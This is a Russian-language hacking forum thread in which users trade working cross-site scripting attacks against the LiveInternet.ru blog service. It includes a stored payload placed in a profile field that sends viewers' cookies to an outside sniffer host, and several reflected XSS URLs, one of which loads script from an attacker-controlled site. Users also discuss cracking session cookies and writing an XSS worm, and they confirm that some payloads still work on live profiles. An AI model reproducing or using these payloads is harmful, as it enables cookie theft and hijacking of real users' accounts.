|
XSS в дневнике LiveInternet.ru
Вот нашол активную xss:
когда регимся, вводим в поле "О новом дневнике - в двух словах" Код:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>потом все кто помотрит ваш профиль отдаст куки... Примеры: http://www.liveinternet.ru/users/hello2all/profile/ - тут отдадите куки http://www.liveinternet.ru/users/nokia1/profile/ - алерт. |
О! санкс! всё пашет!
|
да..+ тебе )))
хотя уже пол года назад знал.....там ваще админы тупят... |
http://www.liveinternet.ru/journal_register.php
Поле:*Подтвердить пароль: не фильтруется! |
)) прикольно,лови +
|
Туплю, не нашел этот пункт :(
Именно где он? Я по новой не регился, я именно хотел бы узнать где он в настройках, + у других в пофиле такого тоже не увидел, Черт не дружу я с таких типов сайтами :( |
именно поэтому ты и не нашёл этот пунктик.
Надо региться заного, тогда найдёшь. |
Пишите Xss вирус =) Мой для ливжурнала помог пользователям получить красивые доменчики третего уровня для своих ЖЖ =)
|
http://market.liveinternet.ru/index.php?id=10091&page=1&vendor=0&sort=2&sortorde r=1&pricelo=10%22%3E%3Cscript%3Ealert()%3C/script%3E0
Пассивная ХSS почти там же! |
PASSIVE XSS при реге счетчиков
http://www.liveinternet.ru/add/add/?rules=agreed&www=&type=site&random=1113854391&url =http%3A%2F%2Flalala.2u2r%2F&aliases=&name="><scri pt src=http://ТВОЙСАЙТ.ru/js.js></script>&email=123%40123.123&password=mikmik&check= mikmik&keywords=&private=&subscribe=on&group=ru&gr oup=ru%2Fauto&ok=+%E4%E0%EB%FC%F8%E5+%3E%3E+ |
Не совсем понял за что "-", но больше вопросов подобного плана задавать не буду. Единственно хотелось бы узнать, что я нарушил.
во-первых посмотри название темы, то что ты написал не относится сюда.Есть вопрос, ищи, если такая тема есть, прочти, если нету, создай в соответствующем разделе и спроси.Разе непонятно почему "-"?Тоже самое относится и другому товарищу.Еще вопросы?С вами был m0nzt3r :) |
если не ошибаюсь пасивный xxs это тот каторый уже прикрыли, так зачем выкладывать его
если не прав объясните что значит пасивный. пассивная, это когда жертва должна зайти по ссылке, которую ты дашь, чтоб хсс подействовала.Понятно?Мало флейми, устал посты стирать твои.. (m0nzt3r) |
ребят, а дырку, по ходу, уже прикрыли. мне почему-то кажется, что тут нетрудно будет другую найти, тут просто <script> фильтруется. *вышесказанное было написано без моска, ибо я в этом деле не очень разбираюсь =)*.
может кто-нибудь башковитый и рукастый сможет сообразить в чем тут дело? помогите, пожалуйста. |
Цитата:
|
2 re-arranged
http://www.liveinternet.ru/member2.php?action=addlist&userlist=buddy&userid=7 29772&userownid=undefined"><script>alert("xss")</script> пассивная |
Цитата:
А что дальше делать? Куки отправляются на снифф общий? если да, то я не могу найти его лог =/ Зы: или это уже вообще не катит? Цитата:
|
Не прикрыли ничего, http://www.liveinternet.ru/users/nokia1/profile/ алерт есть..
2DeadFire лог теперь на old.antichat.ru Код:
<script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> |
Объясните плз для тупых что нужно сделать по шагам.
Зы: там скрипты отсеиваются Зыы: я создал юзера (Vasssssia) в поле краткая инфа запихал скрипт, ну собсно и в основную тоже, на сниф вообще ниче не приходит.. приходит, когда просто в дневник пихаешь "картинку", только толку от этого как от быка молока... Зыыы: за лог спасибо |
2InferNo23 тысяча чертей, отсеиваются <script> </script>.
|
я не любитель создавать темы изза небольших вопросов, поэтому спрошу тут. В куках лиру хранится чистый мд5 или соль?
|
по теме: уязвимость еще существует?
|
короче так, для теста зарегал акк. Зашел под ним, посмотрел в куках bbpassword имеет значение 1008cac831727c728c87294fe37fd18c что не соответствует мд5хэшу введеного пароля 233223 ; значит другой алгоритм шифрования?
|
LeopardSS, врятли, скорее всего это временный "пароль", присвоенный сессии, до её истечения, т.е. пока ты не нажмешь "выйти".
|
Там соль добавляется(((
|
Пассивный...
http://www.liveinternet.ru/showjournal.php?action=draft&journalid="><script>a lert(123)</script> |
никто не подскажет где xss искать на ли.ру? старые дыры админы залатали, а новых я найти не сумел -не на столько про...
если не жалко поделиться, то пишите в личку (обещаю использовать разумно и не сливыть в паблик ни на ачате ни в других местах). заранее благодарю |
Цитата:
|
сам знаю - старую тему поднял. но вместо того чтобы шутить посоветовал бы что-нибудь
|
Цитата:
|
| Время: 10:11 |